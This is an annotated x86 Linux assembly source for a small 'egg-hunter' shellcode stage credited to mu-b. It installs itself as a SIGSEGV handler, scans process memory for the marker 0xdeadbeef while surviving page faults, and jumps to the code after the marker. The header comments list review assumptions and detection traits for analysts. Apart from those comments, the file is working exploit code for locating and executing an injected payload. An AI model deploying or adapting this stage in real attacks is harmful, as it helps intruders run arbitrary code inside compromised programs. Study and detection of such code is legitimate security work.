; ; Copyright (c) 2007 by ;
; 50-byte 32-bit search&jump-signal springboard - (x86-lnx)
; by mu-b - Oct 2006
;
; Syntax: NASM (Intel operand order), 32-bit Linux, raw int 80h syscalls.
;
; What this fragment does (everything below is visible in the code):
;   1. Uses ebp as the base of a one-slot scratch stack ([ebp-4]) and seeds
;      it with __start_addr, the first address to probe.
;   2. Computes its own address (jmp/call/pop trick) and registers get_eip
;      as the SIGSEGV handler via syscall 48 (ebx=11, ecx=handler).
;   3. Reads one dword per address, one byte step at a time, until the
;      dword equals __flag_val, then jumps to the 4 bytes that follow it.
;   A read of unmapped memory faults into the handler, i.e. back to
;   get_eip, which re-registers itself, resets esp to [ebp-4] and resumes
;   the scan at the address saved there (the faulting address + 1).
;
; Review notes / assumptions not established by this file:
;   - ebp must point into a writable stack on entry; nothing here checks it.
;   - The kernel-built signal frame is never returned through sigreturn;
;     the handler simply rewinds esp. Presumably harmless for this loop,
;     but it depends on the kernel not requiring a sigreturn — confirm.
;   - The handler is re-installed on every (re)entry. This reads as a
;     workaround for one-shot handler semantics of the legacy signal
;     syscall, but that reset behaviour is not visible here — verify.
;   - The "50-byte" size in the header is not verified in this review.
;
; Detection-relevant traits (for defenders / analysts): a SIGSEGV handler
; registered via the legacy signal syscall immediately followed by a tight
; fault-driven sequential memory read loop, and a fixed 4-byte marker
; (__flag_val) searched for in memory.

%define __start_addr 0x08102030         ; first address probed by the scan
%define __flag_val   0xdeadbeef         ; 4-byte marker that precedes the payload

global get_eip

        mov     esp, ebp                ; esp = ebp: use [ebp-4] as the only scratch slot
        push    __start_addr            ; [ebp-4] = current probe address

get_eip:                                ; also the SIGSEGV handler entry (see do_signal)
        jmp     short __callback        ; jmp/call/pop: obtain EIP without an absolute address

__get_eip_call:
        pop     ecx                     ; ecx = return address pushed by the call = do_signal
        lea     ecx, [byte ecx-(do_signal-get_eip)]   ; ecx = get_eip (handler address), flags untouched
        jmp     short do_signal

__callback:
        call    near __get_eip_call     ; pushes address of do_signal, then pops it above

do_signal:
        lea     esp, [ebp-4]            ; rewind esp to the scratch slot (also discards any
                                        ; signal frame when entered as the SIGSEGV handler)
        push    byte 11                 ; ebx = 11 = SIGSEGV (2-byte push/pop instead of mov)
        pop     ebx
        lea     eax, [ebx+37]           ; eax = 11 + 37 = 48 = sys_signal on i386 Linux
        int     80h                     ; signal(SIGSEGV /*ebx*/, get_eip /*ecx*/)

search:
        ; invariant on entry: esp == ebp-4 and [esp] == address to probe next
        pop     edi                     ; edi = probe address
        lea     edx, [edi+1]
        push    edx                     ; [ebp-4] = edi+1: where to resume if the read below faults
        mov     esi, [edi]              ; read one dword; an unmapped address faults into get_eip
        cmp     esi, __flag_val         ; marker found?
        jnz     search                  ; no: advance one byte and probe again

finish:
        lea     edi, [edi+4]            ; skip the 4-byte marker
        jmp     edi                     ; transfer control to the bytes after it